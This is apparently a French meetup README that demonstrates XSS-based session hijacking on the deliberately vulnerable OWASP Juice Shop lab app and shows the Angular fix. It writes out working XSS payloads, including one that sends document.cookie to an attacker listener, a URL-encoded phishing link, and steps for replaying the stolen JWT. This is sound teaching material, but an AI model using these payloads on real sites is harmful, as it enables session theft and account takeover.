# Meetup sécurité - XSS, phishing et vol de session 

Ce repo contient les éléments présentés en _meetup_ le 26 janvier 2023 à l'agence Cat-Amania de Niort.

## Objectif du meetup

* Faire la démo et expliquer une attaque de vol de session, qui exploite une vulnérabilité de type _reflected XSS_ sur une application de e-commerce.
* [https://owasp.org/www-community/attacks/Session_hijacking_attack](https://owasp.org/www-community/attacks/Session_hijacking_attack)
* [https://owasp.org/www-community/Types_of_Cross-Site_Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting)

## Présentation de l'application vulnérable

* La [fondation OWASP](https://owasp.org/) est une référence mondiale en sécurité applicative web
* L'application [OWASP juice-shop](https://owasp.org/www-project-juice-shop/) est un site de e-commerce factice, qui contient volontairement un grand nombre de vulnérabilités

![schéma avec intro](./assets/1-meetup-session-hijacking.drawio.png?raw=true)

# Explication de l'attaque

## Introduction

*Une session web* est l'état de navigation d'un internaute identifié sur un site. L'internaute ouvre une session en s'authentifiant sur le site. Lorsqu'il a ouvert une session, le serveur va conserver l'état de sa navigation. Par exemple pour un site de e-commerce, l'état de son panier. [https://fr.wikipedia.org/wiki/Session_(informatique)](https://fr.wikipedia.org/wiki/Session_(informatique))

*Un cookie* est une clé-valeur persistée dans le navigateur. C'est un outil technique qui permet de maintenir une session, au fil des différentes requêtes exécutées par le navigateur.

* Affichage du cookie `token` : Le format est JWT
* Rappel de l'objectif du hack : Si on vole le cookie, on vole la session

*JWT* [https://jwt.io/](https://jwt.io/) est un standard pour transmettre des informations signées.
* Observer le contenu du token dans JWT.io
* Voir la date d'expiration du token (donc de la session) avec [https://www.unixtimestamp.com/](https://www.unixtimestamp.com/)

## Découverte de la vulnérabilité XSS

### Démo d'une vulnérabilité _DOM XSS_

L'exemple suivant est un DOM XSS parce-que, à aucun moment, le payload n'est transmis au serveur.

*Le DOM* : c'est le contenu HTML de la page web. Le navigateur lit le HTML pour découvrir la structure et le contenu d'une page. 

*Le Javascript* : c'est du code source (au même titre que le DOM), mais c'est aussi un langage qui s'exécute dynamiquement dans le navigateur.

* Recherche de `toto`, inscription de `toto` dans le DOM. Pour afficher `toto` sur la page, le navigateur lit la balise.

L'objectif est de déclencher l'exécution de code Javascript, à partir de la saisie utilisateur. Par exemple : `alert('xss')`

Un payload XSS est une balise HTML qui déclenche l'exécution de JS, lorsqu'elle est ajoutée dans le DOM. Par exemple, saisir `<iframe src="javascript:alert('xss')">` dans le champ de recherche

### Les différents types d'attaques XSS

[https://owasp.org/www-community/Types_of_Cross-Site_Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting)

* Reflected XSS (AKA Non-Persistent or Type I) : La saisie utilisateur est interprétée par le navigateur, mais n'est pas persistée. Le payload est dans la requête envoyée au serveur.
* Stored XSS (AKA Persistent or Type II) : La saisie utilisateur est persistée (côté serveur), puis interprétée par les nvaigateurs lorsqu'elle est requêtée. Exemples : commentaires sous un article, posts dans un forum.
* DOM Based XSS (AKA Type-0) : La saisie utilisateur est interprétée par le navigateur, mais n'est pas persistée. Le payload n'est pas envoyée au serveur.

## Exploitation de la faille XSS

### Prérequis

L'utilisateur cible (victime) :
* s'est créé un compte
* s'est authentifié
* a saisi des options de paiement (par exemple)

* Le serveur d'écoute est démarré sur le poste de l'attaquant

### Faire exécuter du JS dans le navigateur de la victime

A cette étape, on sait qu'on peut exécuter du JS dans la page, suite à une saisie dans la barre de recherche. Mais comment forcer la cible à saisir du texte dans la barre de recherche ? La réponse est dans l'URL : quand on recherche `toto`, la recherche est transmise à l'application dans l'URL : `http://192.168.79.83:3000/#/search?q=toto`

### Le JS doit nous envoyer les cookies de la victime

But de l'attaque : Si la cible (victime) est authentifiée dans l'application, on veut voler ses cookies (de façon furtive). 

Quel payload permet de le faire ?
* `<iframe src="http://192.168.79.71:8888/?une_cle=une_valeur">`
  
  `<iframe src='http://192.168.79.71:8888/?'+document.cookie>`

  On voit que le navigateur n'exécute pas le JS `+document.cookie`. La requête envoyée est : `http://192.168.79.71:8888/`

* `<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://192.168.79.71:8888/?'+'une_cle=une_valeur'>`
  
  `<img src=https://github.com/favicon.ico width=0 height=0 onload=this.src='http://192.168.79.71:8888/?'+document.cookie>`
  
  On voit que le navigateur envoie bien ce qu'on veut...

Ensuite on peut récupérer l'URL du lien de phishing.x
* Copier coller dans le navigateur `http://192.168.79.83:3000/#/search?q=%3Cimg%20src%3Dhttps:%2F%2Fgithub.com%2Ffavicon.ico%20width%3D0%20height%3D0%20onload%3Dthis.src%3D'http:%2F%2F192.168.79.71:8888%2F%3F'%2Bdocument.cookie%3E`

* Vérifier le payload dans [https://www.urldecoder.org/](https://www.urldecoder.org/)

* Attendre que l'utilisateur clique sur le lien --> ses cookies apparaissent sur le serveur d'écoute

* Copier coller le jwt dans [https://jwt.io/](https://jwt.io/) : on voit bien le JWT de la cible

### Utiliser le token pour voler la session

* S'authentifier avec un compte quelconque
* Ecraser le cookie dans le navigateur
  ```
  document.cookie = "token=le_token; SameSite=None";
  ```
* Remplacer le [header HTTP](https://developer.mozilla.org/fr/docs/Web/HTTP/Headers) `Authorization` dans chaque requête
  ```
  Authorization: Bearer le_token
  ```
  Pour faire ça, on utilise le proxy burpsuite. Firefox envoie toutes ses requêtes au proxy, et le proxy remplace tous les headers `Authorization` avec la valeur `Bearer le_token`.

## Résumé de l'attaque :

![schéma vol de session](./assets/2-meetup-session-hijacking.drawio.png?raw=true)

# Code source

Dans le [code source](https://github.com/juice-shop/juice-shop/tree/v14.4.0)

Dans le fichier search-result.component.ts, ligne 152, remplacer:
```
this.searchValue = this.sanitizer.bypassSecurityTrustHtml(queryParam)
```
avec :
```
this.searchValue = queryParam
```

On remarque que le framework Angular gère nativement la sécurité XSS : [https://angular.io/guide/security#angulars-cross-site-scripting-security-model](https://angular.io/guide/security#angulars-cross-site-scripting-security-model) : "To systematically block XSS bugs, Angular treats all values as untrusted by default."

D'où l'importance :
* d'utiliser des libs ou frameworks éprouvés
* et de faire très régulièrement les patchs et montées de versions.

# Exemple Java Servlet

[https://www.stackhawk.com/blog/java-xss/](https://www.stackhawk.com/blog/java-xss/)

# Exemple PHP

[https://brightsec.com/blog/cross-site-scripting-php/](https://brightsec.com/blog/cross-site-scripting-php/)

# Resources

[https://github.com/s0md3v/AwesomeXSS](https://github.com/s0md3v/AwesomeXSS)

[https://twitter.com/theXSSrat](https://twitter.com/theXSSrat)

[https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)